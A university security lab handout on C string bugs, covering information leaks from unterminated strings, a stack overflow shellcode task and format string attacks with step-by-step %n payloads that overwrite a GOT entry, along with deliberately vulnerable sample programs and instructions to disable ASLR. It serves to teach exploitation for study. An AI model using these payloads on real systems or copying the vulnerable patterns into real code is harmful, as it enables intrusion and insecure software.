

Lab 09 - Strings

Resources

Lab Support Files

We will use this lab archive throughout the lab.

Please download the lab archive and then unpack it using the commands below:

student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-09.tar.gz
student@mjolnir:~$ tar xzf lab-09.tar.gz

After unpacking we will get the lab-09/ folder that we will use for the lab:

student@mjolnir:~$ cd lab-09/
student@mjolnir:~/lab-09$ ls
basic-format-string  basic-info-leak
format-string  info-leak
printf-features  string-shellcode

Intro

This is a tutorial-based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) use classes to represent strings – this simplifies the way strings are handled and decreases the frequency of programming errors.

What is a string?

Conceptually, a string is a sequence of characters. A string can be represented in multiple ways. One of them is a contiguous memory buffer in which each character is stored according to a character encoding. For example, the ASCII encoding uses 7-bit integers to encode each character – because it is more convenient to store 8 bits at a time in a byte, an ASCII character is stored in one byte.

The type for representing an ASCII character in C is char and it uses one byte. As a side note, sizeof(char) == 1 is the only size that the C standard fixes exactly; the sizes of the other basic types are implementation defined.

Another option is Unicode, with encodings such as UTF-8, UTF-16 and UTF-32. The idea is that, in order to represent a Unicode string, more than one byte may be needed for one character. char16_t and char32_t were introduced in the C11 standard (in <uchar.h>) to represent such strings. The C language also has another type, called wchar_t, whose size is implementation defined and which should therefore not be used to represent Unicode characters.

Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls string manipulation functions that assume a specific encoding of the string.

You will find extensive information on ASCII in the ascii man page. Inside a Unix terminal, issue the command:

man ascii

Length management

In C, the length of an ASCII string is given by its contents: an ASCII string ends with a 0-valued byte called the NUL byte. Every str* function (i.e. a function whose name starts with str, such as strcpy, strcat, strdup, strstr etc.) uses this 0 byte to detect where the string ends. As a result, passing strings that are not NUL-terminated to str* functions leads to vulnerabilities: the function keeps reading (or writing) past the end of the buffer until it happens to find a 0 byte.
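A minimal sketch of this rule (the array contents and helper names are made up for illustration): the array below occupies 8 bytes, but str* functions only see the bytes before the first NUL.

```c
#include <assert.h>
#include <string.h>

/* "abc\0def" occupies 8 bytes: 7 characters plus the NUL that the
 * compiler appends. The embedded \0 ends the string as far as the
 * str* functions are concerned. */
static const char sample[] = "abc\0def";

/* Length as seen by str* functions: the bytes before the first NUL. */
static size_t visible_length(void)
{
	return strlen(sample);
}

/* strcpy() stops at (and copies) the first NUL, so only "abc" reaches
 * dst; dst must hold at least strlen(sample) + 1 bytes. */
static void copy_sample(char *dst, size_t dst_size)
{
	assert(dst_size >= strlen(sample) + 1);
	strcpy(dst, sample);
}
```

Conversely, if a buffer contains no 0 byte at all, strlen() and strcpy() read past its end, which is exactly what the following tasks exploit.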

[1p] Basic Info Leak (tutorial)

Enter the basic-info-leak/ subfolder in the lab archive. It's a basic information leak example.

In basic_info_leak.c, buf is supplied as input, hence it is not trusted, and we should be careful with this buffer. If the user gives 32 bytes as input, strcpy will copy bytes into my_string until it finds a NUL byte (0x00), so it does not stop at the end of buf. Because the stack grows down on most platforms, the bytes after buf (at higher addresses) belong to the current stack frame and to the frames of the callers: after the buf variable the stack stores the old ebp, the function return address and then the function parameters. This information is copied into my_string as well. As such, printing my_string with puts() also prints the bytes past index 32, which results in an information leak.

We can test this using:

$ python -c 'print("A"*32)' | ./basic_info_leak
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����

In order to check the hexadecimal values of the leak, we pipe the output through xxd:

$ python -c 'print("A"*32)' | ./basic_info_leak | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 786d 99ff f184 0408 0a

We have leaked two values above:

  • the old/stored ebp value (right after the buffer): 0xff996d78 (it's a little endian architecture); it will differ on your system
  • the my_main() return address: 0x080484f1
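Decoding the leaked words by hand is error-prone. The helpers below (hypothetical names) are a small sketch that rebuilds the two values from the bytes in the xxd dump above, assuming a 32-byte buffer followed by the old ebp and the return address.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rebuilds a 32-bit value from 4 bytes stored in little-endian order
 * (least significant byte at the lowest address), as on x86. */
static uint32_t le32(const unsigned char *p)
{
	return (uint32_t)p[0]
	     | (uint32_t)p[1] << 8
	     | (uint32_t)p[2] << 16
	     | (uint32_t)p[3] << 24;
}

/* Extracts the two words that follow a buffer of buf_len bytes. */
static void parse_leak(const unsigned char *leak, size_t buf_len,
                       uint32_t *old_ebp, uint32_t *ret_addr)
{
	*old_ebp = le32(leak + buf_len);
	*ret_addr = le32(leak + buf_len + 4);
}
```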

The return address usually doesn't change (except for PIE, Position Independent Executable, binaries). But, assuming ASLR is enabled, the ebp value changes at each run. If we leak it, we have a base address that we can use to compute the addresses of other values to leak or overwrite. We'll see more of that in the Information Leak task.

[2.5p] Recap: String Shellcode

For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.

In the string-shellcode/ subfolder in the lab archive you have a vulnerable executable dubbed string_shellcode. The original source code is string_shellcode.c. There is an obvious vulnerability when using strcpy() that will lead to an overflow and a rewrite of the get_num_alpha() function return address when called with a large enough number of characters in g_buffer.

Fill the TODO spots in the exploit.py script to inject and execute a shell.

ASLR is on. The shellcode will be stored at the beginning of the g_buffer global variable which has a constant address. You can determine it using:

nm string_shellcode | grep ' g_buffer'

Use the pattc and patto commands of GDB PEDA to determine the offset between l_buffer and the get_num_alpha() function return address.

In GDB/PEDA, in order to send a given string (such as the pattern output by pattc) to the program standard input, use the process substitution construct:

gdb-peda$ r < <(echo 'AAAA.....')

Construct the payload as usual: add the shellcode, add padding and overwrite the get_num_alpha() function return address with the address of the shellcode (i.e. the address of the g_buffer global variable).
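For reference, the payload layout can be sketched in C (exploit.py remains the place to implement it). The helper name is hypothetical, and the shellcode bytes, offset and address in the test are placeholders; use the values you get from patto and nm.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Layout: shellcode | 'A' padding up to `offset` | return address (LE).
 * `offset` is the distance from the start of the overflowed buffer to the
 * saved return address, e.g. as reported by patto. Returns the payload
 * length, or 0 if it cannot be built. */
static size_t build_payload(unsigned char *out, size_t out_size,
                            const unsigned char *shellcode, size_t sc_len,
                            size_t offset, uint32_t ret_addr)
{
	if (sc_len > offset || offset + 4 > out_size)
		return 0;
	memcpy(out, shellcode, sc_len);
	memset(out + sc_len, 'A', offset - sc_len);
	for (size_t i = 0; i < 4; i++)
		out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
	/* The payload travels through strcpy(), which stops at the first NUL
	 * byte, so reject payloads that contain one. */
	if (memchr(out, 0, offset + 4) != NULL)
		return 0;
	return offset + 4;
}
```

The NUL check matters in practice: an address such as 0x0804a000 cannot be injected through strcpy() as is.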

[3.5p] Information Leak

We will now show how improper string handling leads to information leaks from memory. For this, please access the info-leak/ subfolder in the lab archive and browse the info_leak.c source code file. The executable file, info_leak (a 32-bit ELF file), is already generated.

The snippet below is the relevant part of the code. The goal is to call the my_evil_func() function. One of the building blocks of exploiting a vulnerability is finding out whether or not we have memory write. If we have memory writes, then getting code execution is a matter of getting the details right. In this task we assume that we have memory write (i.e. we can write any value at any address). You can call the my_evil_func() function by overwriting the return address of the my_main() function:

#define NAME_SZ 32
 
static void read_name(char *name)
{
	memset(name, 0, NAME_SZ);
	read(0, name, NAME_SZ);
	//name[NAME_SZ-1] = 0;
}
 
static void my_main(void)
{
	char name[NAME_SZ];
 
	read_name(name);
	printf("hello %s, what address to modify and with what value?\n", name);
	fflush(stdout);
	my_memory_write();
	printf("Returning from main!\n");
}

What catches our eye is that the read() call in the read_name() function reads up to 32 bytes and does not add a terminating NUL byte (the line that would do it is commented out). If we provide exactly 32 bytes, name won't be NUL-terminated, which will result in an information leak when printf() is called in the my_main() function.
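For comparison, here is a sketch of a fixed variant (hypothetical read_name_safe(), taking the file descriptor as a parameter). It reads at most NAME_SZ - 1 bytes and always terminates the string, similar in spirit to the commented-out line.

```c
#include <assert.h>
#include <string.h>
#include <unistd.h>

#define NAME_SZ 32

/* Reads at most NAME_SZ - 1 bytes, so there is always room for the NUL
 * terminator, and terminates whatever was actually read. */
static void read_name_safe(int fd, char *name)
{
	ssize_t n = read(fd, name, NAME_SZ - 1);

	if (n < 0)
		n = 0;
	name[n] = '\0';
}
```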

Exploiting the memory write using the info leak

Let's first try to see how the program works:

$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak 
hello AAAAAAAAAA, what address to modify and with what value?

The binary reads input from the user using read(), as we can see below:

$ python -c 'import sys; sys.stdout.write(10*"A")' | strace -e read ./info_leak
strace: [ Process PID=7736 runs in 32 bit mode. ]
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
read(0, "AAAAAAAAAA", 32)               = 10
hello AAAAAAAAAA, what address to modify and with what value?
read(0, "", 4)                          = 0
+++ exited with 255 +++

The input is read using the read() system call. The read() on file descriptor 3 is the dynamic loader reading the ELF header of a shared library; the first read from standard input (file descriptor 0) requests 32 bytes. You can already see that there's another read() call: that one is the first read() call in the my_memory_write() function.

As noted above, if we use exactly 32 bytes for name, we will end up with a non-NUL-terminated string, leading to an information leak. Let's see how that goes:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak
hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���, what address to modify and with what value?
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd
00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 58da e0ff 0586 0408 2c20  AAAAAAX......., 
00000030: 7768 6174 2061 6464 7265 7373 2074 6f20  what address to 
00000040: 6d6f 6469 6679 2061 6e64 2077 6974 6820  modify and with 
00000050: 7768 6174 2076 616c 7565 3f0a            what value?.

We see we have an information leak. We leak two pieces of data above: 0xffe0da58 (from the little endian bytes 58 da e0 ff) and 0x08048605. The first one seems to be a stack address and the second one a code/text address.

If we run the program multiple times, we can see that the value of the first piece of information differs:

$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 18e8 9fff 0586 0408 2c20  AAAAAA........, 
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 4879 ccff 0586 0408 2c20  AAAAAAHy......, 
 
$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd | grep ','
00000020: 4141 4141 4141 9867 9bff 0586 0408 2c20  AAAAAA.g......,

The variable part is related to a stack address (it starts with 0xff); it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents:

$ gdb -q ./info_leak
Reading symbols from ./info_leak...done.
gdb-peda$ b printf
Breakpoint 1 at 0x80483c0
gdb-peda$ r < <(python -c 'import sys; sys.stdout.write(32*"A")')
Starting program: /home/razvan/school/2012-2013/oss/repo.git/labs/lab-09/info-leak/info_leak < <(python -c 'import sys; sys.stdout.write(32*"A")')
[...]
 
Breakpoint 1, 0xf7e2a8f0 in printf () from /lib/i386-linux-gnu/libc.so.6
gdb-peda$ bt
#0  0xf7e2a8f0 in printf () from /lib/i386-linux-gnu/libc.so.6
#1  0x080485d7 in my_main () at info_leak.c:43
#2  0x08048605 in main () at info_leak.c:51
#3  0xf7df9276 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#4  0x08048451 in _start ()
gdb-peda$ up
#1  0x080485d7 in my_main () at info_leak.c:43
43		printf("hello %s, what address to modify and with what value?\n", name);
gdb-peda$ x/12wx name
0xffffd270:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd280:	0x41414141	0x41414141	0x41414141	0x41414141
0xffffd290:	0xffffd298	0x08048605	0x00000000	0xf7df9276
gdb-peda$ x/2i 0x08048605
   0x8048605 <main+8>:	push   0x8048710
   0x804860a <main+13>:	call   0x80483e0 <puts@plt>
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x080485fd <+0>:	push   ebp
   0x080485fe <+1>:	mov    ebp,esp
   0x08048600 <+3>:	call   0x80485b7 <my_main>
   0x08048605 <+8>:	push   0x8048710
   0x0804860a <+13>:	call   0x80483e0 <puts@plt>
   0x0804860f <+18>:	add    esp,0x4
   0x08048612 <+21>:	mov    eax,0x0
   0x08048617 <+26>:	leave  
   0x08048618 <+27>:	ret    
End of assembler dump.
gdb-peda$  

From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ebp (i.e. old ebp) and one value is the return address of the my_main() function (that gets it back to main()).

When we leak the two values, we retrieve the stored ebp value. In the above run, the stored ebp value is 0xffffd298. We also see that it is stored at address 0xffffd290, which is the current value of ebp (the frame pointer of my_main()). The x/12wx output above corresponds to the following layout:

0xffffd270 ... 0xffffd28f   name[] (32 bytes, all 0x41)
0xffffd290                  stored ebp: 0xffffd298 (frame pointer of main())
0xffffd294                  return address of my_main(): 0x08048605

In short, if we leak the value of the stored ebp (i.e. the frame pointer for main(): 0xffffd298), we can determine the address of the current ebp (i.e. the frame pointer for my_main(): 0xffffd290) by subtracting 8. The address where the my_main() return address is stored (0xffffd294) is computed by subtracting 4 from the leaked ebp value. By overwriting the value at this address, we redirect execution when my_main() returns and call my_evil_func().
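The arithmetic can be written down as follows. This is a sketch (hypothetical helper names) assuming the frame layout observed in the GDB session: 32-bit x86, frame pointers, and a main() without local variables. The test values come from the GDB run and from the sample exploit output later in this task.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed layout, relative to the leaked old ebp (main()'s frame pointer):
 *   old_ebp - 4 : return address of my_main()
 *   old_ebp - 8 : where main()'s ebp is saved; my_main()'s ebp points here */
static uint32_t my_main_ebp(uint32_t old_ebp)
{
	return old_ebp - 8;
}

static uint32_t my_main_ret_slot(uint32_t old_ebp)
{
	return old_ebp - 4;
}
```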

In order to overwrite the return address of the my_main() function with the address of the my_evil_func() function, make use of the conveniently (but not realistically) placed my_memory_write() function.

Considering all of this, update the TODO lines of the exploit.py script to make it call the my_evil_func() function.

Same as above, use nm to determine the address of the my_evil_func() function.

Use the above logic to determine the old ebp leak and then the address of the my_main() return address.

See the documentation of the pwntools unpack() function for examples of converting the leaked bytes into an integer.

In case of a successful exploit, the my_evil_func() function makes the program exit with code 42, as below:

$ python exploit.py 
[+] Starting local process '../info_leak': Done
[*] old_ebp is 0xffd66228
[*] return address is located at is 0xffd66224
[*] Process '../info_leak' stopped with exit code 42

The rule of thumb is: Always know your string length.

Format String Attacks

We will now see how (im)proper use of printf may provide us with ways of extracting information or doing actual attacks.

Calling printf, or any other function that takes a format string as a parameter, directly with a user-supplied string as the format leads to a vulnerability exploitable through a format string attack.

The definition of printf:

int printf(const char *format, ...);

Let's recap some useful format specifiers:

  • %08x – takes an unsigned int from the stack and prints it in hexadecimal, zero-padded to 8 digits
  • %s – takes a pointer from the stack and prints the string found at that address
  • %n – writes the number of bytes printed so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used, but it is part of the C standard.
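The first and last specifiers can be tried safely with snprintf() and a constant format string. This sketch (hypothetical helper names) assumes a libc that still honors %n: glibc does for read-only format strings, while the Microsoft C runtime disables %n by default.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* %08x: unsigned int in hexadecimal, zero-padded to at least 8 digits. */
static void hex8(char *buf, size_t size, unsigned int value)
{
	snprintf(buf, size, "%08x", value);
}

/* %n: stores the number of characters produced so far into the int that
 * the matching argument points to. The format here is a constant literal. */
static int count_before_n(char *buf, size_t size, const char *word)
{
	int count = -1;

	snprintf(buf, size, "%s%n!", word, &count);
	return count;
}
```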

%x and %n are enough to obtain memory read and memory write and, hence, to successfully exploit a vulnerable program that calls printf (or another format string function) directly with a string controlled by the user.

Example 2

printf(my_string);

The above snippet is a good example of why ignoring compile-time warnings is dangerous: this pattern is easily detected by a static checker, and GCC reports it with -Wformat-security.

Try to think about:

  • The peculiarities of printf (variable number of arguments)
  • Where printf stores its arguments (hint: on the stack)
  • What happens when my_string is "%x"
  • How matching between format strings (e.g. the one above) and arguments is enforced (hint: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers
  • How we could use this to cause information leaks and arbitrary memory writes (hint: see the format specifiers at the beginning of the section)
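The fix is to never use user data as the format. Here is a minimal sketch (hypothetical helper format_user_string()) that passes the user text as an argument to a constant "%s" format, so specifiers inside it are printed literally. The same applies to printf("%s", my_string) or fputs(my_string, stdout).

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* The user-controlled text is an argument, never the format, so any
 * %x or %n it contains is copied as plain characters. */
static void format_user_string(char *dst, size_t size, const char *user)
{
	snprintf(dst, size, "%s", user);
}
```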

[1p] Example 3

We would like to check some of the well-known and not-so-well-known features of the printf function. Some of them may be used for information leaks and for attacks such as format string attacks.

Go into the printf-features/ subfolder and browse the printf-features.c file. Compile the executable file using:

make

and then run the resulting executable file using

./printf-features

Go through the printf-features.c file again and check how the width, precision, length and conversion specifiers are used by printf. We will make use of the %n feature, which allows memory writes, a requirement for attacks.
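A few of these features are shown below with snprintf() so the results can be checked. The helper names are hypothetical and are not taken from printf-features.c.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Field width 8 and precision 3: "3.142" right-aligned in 8 characters. */
static void width_and_precision(char *buf, size_t size)
{
	snprintf(buf, size, "[%8.3f]", 3.14159);
}

/* A '*' width is taken from the argument list (here 5). */
static void width_from_argument(char *buf, size_t size)
{
	snprintf(buf, size, "[%*d]", 5, 42);
}

/* The '-' flag left-aligns the field. */
static void left_aligned(char *buf, size_t size)
{
	snprintf(buf, size, "[%-4s]", "ab");
}

/* The hh length modifier converts the argument to unsigned char. */
static void char_length(char *buf, size_t size)
{
	snprintf(buf, size, "%hhx", 0x1234);
}
```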

[2p] Basic Format String Attack

You will now do a basic format string attack using the basic-format-string/ subfolder in the lab archive. The source code is in basic_format_string.c and the executable is in basic_format_string.

You need to use %n to overwrite the value of the v variable with 100. You have to do three steps:

  1. Determine the address of the v variable using nm.
  2. Determine the n-th parameter of printf() that you can write to using %n. That parameter has to be located in the buffer variable, since you will store the address of the v variable in buffer.
  3. Construct a format string that enables the attack; the number of characters printed by printf() until %n is matched has to be 100.

For the second step, let's run the program multiple times and figure out at which argument position the buffer starts. We fill buffer with the aaaa string and we expect to discover it (as 61616161) using the printf() format specifiers.

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx
f76f65a0ffd559a0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f75718700000000a

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%llx
f76fa5a0ffc4e5c0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f757000a786c6c25616161610804856b

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%lx
f77115a0ffa03f30786c6c25080484a2786c6c25786c6c25786c6c25786c6c25f758c8000a786c25804856b

$ ./basic_format_string 
aaaa
%llx%llx%llx%llx%llx%lx%lx
f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b61616161

In the last run we get 61616161, the representation of aaaa. That means that, if we replace the final %lx with %n, we will write the number of characters printed so far at address 0x61616161. That number is:

$ echo -n 'f77535a0fffef1d0786c6c25080484a2786c6c25786c6c25786c6c25786c6c25a786c25786c25804856b' | wc -c
84

We need that number to be 100. You can fine-tune the format string by using a construct such as %32llx, which prints a number padded to at least 32 characters instead of the (at most) 16 characters that %llx produces. See how much extra room you need to reach 100 bytes.

The width needn't be a multiple of 8: you may use %32llx, %33llx or %42llx. The numeric argument sets the minimum length of the printed output.
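The padding calculation can be sketched as below (hypothetical helper name). It assumes, as in the last run, that the first %llx printed 16 characters. The printed values change between runs because of ASLR, so re-check that length.

```c
#include <assert.h>
#include <stdio.h>

/* total: characters printed so far; field_len: characters that one %llx
 * contributed to it. Returns the width W such that %<W>llx in place of
 * that field makes the total equal target, or -1 if the field would have
 * to shrink (a width only pads, it never truncates). */
static int width_for_target(int total, int field_len, int target)
{
	int width = target - (total - field_len);

	return width >= field_len ? width : -1;
}
```

With these numbers, replacing the first %llx with %32llx brings the total from 84 to 100.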

After the plan is complete, write down the attack by filling the TODO lines in the exploit.py solution skeleton.

[3p] Extra: Format String Attack

The goal of this task is to call my_evil_func again. This task is also tutorial based.

int
main(int argc, char *argv[])
{
	printf(argv[1]);
	printf("\nThis is the most useless and insecure program!\n");
	return 0;
}

Transform Format String Attack to a Memory Write

Any string that represents a useful format (e.g. %d, %x etc.) can be used to discover the vulnerability.

$ ./format "%08x %08x %08x %08x"
00000000 f759d4d3 00000002 ffd59bd4
This is the most useless and insecure program!

The values starting with 0xf are very likely pointers. Again, we can use this vulnerability as an information leak. But we want more.

Another useful format for us is %m$ followed by the rest of a normal format specifier, which means that the m-th parameter is used as the input for that format. For example, %10$08x prints the 10th parameter with %08x. This allows us to access the stack precisely.

Example:

$ ./format "%08x %08x %08x %08x %1\$08x %2\$08x %3\$08x %4\$08x"
00000000 f760d4d3 00000002 ff9aca24 00000000 f760d4d3 00000002 ff9aca24
This is the most useless and insecure program!

Note the equivalence between formats.
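The positional syntax can also be checked in isolation with snprintf(), as in the sketch below (hypothetical helper name). %m$ is a POSIX extension rather than ISO C. POSIX leaves mixing numbered and unnumbered conversions undefined, but the glibc used above accepts the mixed format anyway.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* %2$08x reads the 2nd argument, %1$08x the 1st; an argument may be
 * used several times. Every argument from 1 to the highest one referenced
 * is used, as POSIX requires for numbered conversions. */
static void positional(char *buf, size_t size, unsigned int a, unsigned int b)
{
	snprintf(buf, size, "%2$08x %1$08x %2$08x", a, b);
}
```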

Now, because positional arguments let us reach arbitrarily far up the stack (towards higher addresses), and because our buffer (argv[1]) is also on the stack, sooner or later we will discover our own buffer.

$ ./format "$(perl -e 'printf "%%08x\x0a"x10000')" 

Depending on your setup, you should be able to see the hex representation of the string "%08x\n" in the output (for example 78383025, which is "%08x" read as a little endian word).

Why do we need our own buffer? Remember the %n format? It writes to an address given as a parameter. The idea is to place the target address in our buffer, so that %n uses it as its parameter, and thus achieve memory writes. We will see later how to control the value.

The next steps are done with ASLR disabled. In order to disable ASLR, please run

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

By trial and error, or by using GDB (with a breakpoint on printf), we can determine where our buffer is located:

$ ./format "$(perl -e 'printf "A"x512 . "%%08x   \x0a"x200')"  | grep -n 41 | head
17:415729ac   
56:ffffdd41   
128:41007461   
129:41414141   
130:41414141 

Command-line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference Perl script to write your exploit. The code is equivalent to the above one-liner, except that it dumps 1000 stack items instead of 200.

#!/usr/bin/env perl
 
use strict;
use warnings;
use v5.20;
 
my $stack_items = 1000;
 
printf "A" x 512;
printf "%%08x   \x0a" x $stack_items;

Then call the format program using (note the enclosing double quotes):

$ ./format "$(perl exploit.pl)"

One idea is to keep things in multiples of 4, as done for "%08x   \x0a" (8 bytes). If you look at line 128, one of our As is there. Because the machine is little endian, the 0x41 appears as the most significant byte, which means our buffer does not start on a 4-byte boundary. We want to fix this, to have our buffer aligned. Note that you can add as many format strings as you want; the start of the buffer will stay (more or less) the same.

We can compress our buffer by specifying the position of the argument.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08x"')"
BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342
This is the most useless and insecure program!

You can see that the last value printed is our "BCDE" string (45444342, printed with %08x), which means that we know where our buffer is: it is the 126th argument.

You need to enable core dumps in order to reproduce the steps below:

$ ulimit -c unlimited

The steps below were performed on a given libc version and a given system. That is why the instruction that causes the fault is

mov %edx,(%eax)

or the equivalent in Intel syntax

mov DWORD PTR [eax], edx

It may be different on your system; for example, edx may be replaced by esi, such as

mov DWORD PTR [eax], esi

Update the explanations below accordingly.

Remove any core files you may have generated before testing your program:

rm -f core

If we replace %08x with %n, this should lead to a segmentation fault.

$ ./format "$(perl -e 'printf "BCDE"."A"x510 . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
...
Core was generated by `./format BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xf7e580a2 in vfprintf () from /lib/i386-linux-gnu/libc.so.6
#1  0xf7e5deff in printf () from /lib/i386-linux-gnu/libc.so.6
#2  0x08048468 in main (argc=2, argv=0xffffd2f4) at format.c:18
(gdb) x/i $eip
=> 0xf7e580a2 <vfprintf+17906>:	mov    %edx,(%eax)
(gdb) info registers $edx $eax
edx            0x202	514
eax            0x45444342	1162101570
(gdb) quit

Bingo. We have memory write. The vulnerable code tried to write, at the address 0x45444342 ("BCDE" in little endian), the value 514. The value 514 is the amount of data written so far by printf ("BCDE" and 510 As).

Right now, our input string has 522 bytes. But we can keep its length constant and control the written value with a padding format, thus making the value that we write independent of the length of the input.

$ ./format "$(perl -e 'printf "BCDE". "A"x506 . "%%99x" . "%%126\$08n"')"
Segmentation fault (core dumped)
$ gdb ./format -c core
(gdb) info registers $edx $eax
edx            0x261	609
eax            0x45444342	1162101570
(gdb) quit

Here we managed to write 609 (4+506+99). Note that we should keep the number of bytes before the %126$08n specifier the same (4+506+4 = 514, as before), so that our buffer stays in place. This means that if we want to print with a padding of 100 (three digits), we should remove one more A. You can try this by yourself.

How far can we go? We can probably use any integer to specify the padding of a format, but we don't need this; moreover, specifying a very large padding is not always feasible (think what happens when printing with snprintf). 255 should be enough.

Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 arbitrary bytes, we can make use of the endianness of the machine: each %n stores a 4-byte integer whose least significant byte lands at the lowest address, so we write at address n, then at address n+1 and so on, each time setting one more byte.

Let's first display the address. We are using the address 0x804a008, the address of the GOT entry for the puts function. Basically, we will overwrite the GOT entry for puts: the second printf() call in main() only prints a constant string ending in a newline, so the compiler turns it into a call to puts().

$ objdump -R ./format | grep puts
0804a008 R_386_JUMP_SLOT   puts
$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08x" . "%%255x|" . "%%127\$08x" . "%%255x|" . "%%128\$08x" . "%%255x|" . "%%129\$08x"')"
 
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
0|0804a008
f7e2a4d3|0804a009
2|0804a00a
ffffd2c4|0804a00b
[...] This is the most useless and insecure program!

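Why are we printing 498 As? We added 12 bytes (three more addresses) before our format, so we removed 12 As to keep 514 bytes before the first format specifier (16 + 498). Each "%255x|" group adds 6 bytes to the input; the | is there only for pretty printing. We want the first address to stay at argument position 126; anyway, you should always check this.

Let's replace %x with %n: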

$ ./format "$(perl -e 'printf "\x08\xa0\x04\x08". "\x09\xa0\x04\x08" . "\x0a\xa0\x04\x08". "\x0b\xa0\x04\x08" . "A"x498 . "%%255x|" . "%%126\$08n" . "%%255x|" . "%%127\$08n" . "%%255x|" . "%%128\$08n" . "%%255x|" . "%%129\$08n"')"
$ gdb ./format -c core
Program terminated with signal 11, Segmentation fault.
#0  0x02020202 in ?? ()
(gdb) x/x 0x0804a000
0x804a000 <printf@got.plt>:	0xf7e5ded0
(gdb) x/x 0x0804a004
0x804a004 <fwrite@got.plt>:	0x08048396
(gdb) x/x 0x0804a008
0x804a008 <puts@got.plt>:	0x02020202
(gdb) x/x 0x0804a00c
0x804a00c <__gmon_start__@got.plt>:	0x08000006
(gdb) 

In the gdb session above you can see:

  1. the GOT entry for printf points to a library address (the address starts with 0xf)
  2. the GOT entry for fwrite points to some code inside the binary. This means that the function hasn't been called yet, so the dynamic linker hasn't resolved its address yet.
  3. the puts entry points to 0x02020202. This is the value that we wrote.

How come we wrote the first 0x02? Just before executing the first %n the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) == 0x302.

How come the rest of the bytes are 0x02? After executing the first %n, we printed another 256 bytes before each %n, so we actually wrote 0x402, 0x502 and 0x602 at the next three addresses. You can see that the three least significant bytes of __gmon_start__@got.plt are now 0x000006, spilled over from the last write.
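The 0x02020202 and 0x08000006 values can be reproduced with a small model of the four overlapping %n writes. This sketch represents the 8 bytes of the GOT starting at 0x0804a008 as an array; the initial contents and helper names are made-up placeholders.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* What %n does on 32-bit little-endian x86: store a 4-byte int at offset
 * addr, least significant byte first. */
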